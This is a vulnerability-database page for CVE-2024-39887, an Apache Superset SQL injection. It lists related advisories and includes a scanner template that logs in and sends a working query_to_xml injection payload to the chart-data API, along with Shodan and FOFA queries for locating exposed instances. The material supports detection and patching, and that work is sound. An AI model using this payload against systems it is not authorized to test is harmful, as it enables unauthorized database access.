| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for SQL Injection in Apache Superset | 12 Apr 202615:44 | – | githubexploit | |
| Exploit for SQL Injection in Apache Superset | 8 Apr 202610:46 | – | githubexploit | |
| The vulnerability of the version/query_to_xml/inet_server_addr/inet_client_addr function in Apache Superset visualization software allows a hacker to bypass existing security restrictions. | 23 Jul 202400:00 | – | bdu_fstec | |
| CVE-2024-39887 | 16 Jul 202412:55 | – | circl | |
| Apache Superset 安全漏洞 | 16 Jul 202400:00 | – | cnnvd | |
| Apache Superset SQL Injection Vulnerability (CNVD-2024-35190) | 17 Jul 202400:00 | – | cnvd | |
| CVE-2024-39887 | 16 Jul 202409:20 | – | cve | |
| CVE-2024-39887 Apache Superset: Improper SQL authorisation, parse not checking for specific engine functions | 16 Jul 202409:20 | – | cvelist | |
| Apache Superset vulnerable to improper SQL authorization | 16 Jul 202412:30 | – | github | |
| CVE-2024-39887 | 16 Jul 202410:15 | – | nvd |
id: CVE-2024-39887
info:
name: Apache Superset < 4.0.2 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
An SQL Injection vulnerability in Apache Superset exists due to improper neutralization of special elements used in SQL commands. Specifically, certain engine-specific functions are not checked, which allows attackers to bypass Apache Superset's SQL authorization. To mitigate this, a new configuration key named DISALLOWED_SQL_FUNCTIONS has been introduced. This key disallows the use of the following PostgreSQL functions- version, query_to_xml, inet_server_addr, and inet_client_addr. Additional functions can be added to this list for increased protection.
impact: |
Authenticated attackers can bypass SQL authorization to execute restricted database queries.
remediation: |
Users are recommended to upgrade to version 4.0.2, which fixes the issue.
reference:
- https://blog.quarkslab.com/bypass-apache-superset-restrictions-to-perform-sql-injections.html
- http://www.openwall.com/lists/oss-security/2024/07/16/5
- https://lists.apache.org/thread/j55vm41jg3l0x6w49zrmvbf3k0ts5fqz
- https://nvd.nist.gov/vuln/detail/CVE-2024-39887
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2024-39887
cwe-id: CWE-89
epss-score: 0.04433
epss-percentile: 0.90218
metadata:
verified: true
max-request: 3
vendor: apache
product: superset
shodan-query:
- http.favicon.hash:"1582430156"
- http.html:"apache superset"
fofa-query:
- body="apache superset"
- icon_hash=1582430156
tags: cve,cve2024,apache,superset,sqli,authenticated,vuln
variables:
marker: "{{randstr}}"
http:
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
matchers:
- type: dsl
dsl:
- 'contains(header_2, "session")'
- 'contains(body, "DashboardFilterStateRestApi")'
condition: and
extractors:
- type: regex
name: csrf_token
part: body
group: 1
regex:
- 'name="csrf_token" type="hidden" value="(.*)"'
internal: true
- raw:
- |
POST /api/v1/chart/data HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"datasource":{"id":1,"type":"table"},"queries":[{"row_limit":1, "columns":[{"sqlExpression":"query_to_xml($$select convert_from(decode('{{base64(marker)}}', 'base64'),'utf8')$$,true,true,'')-- -", "label":"aaaa", "expressionType":"SQL"}]}]}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "<convert_from>{{marker}}</convert_from>")'
condition: and
# digest: 4a0a0047304502204fd6bf84544f9f5676c7aa35e9fb31e2c0967121f2b6100d4076c61d4591f175022100bb10989daef30e00d70a4767ca64aa1e0f521c7f788f7ff09ee0860c81d165ac:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation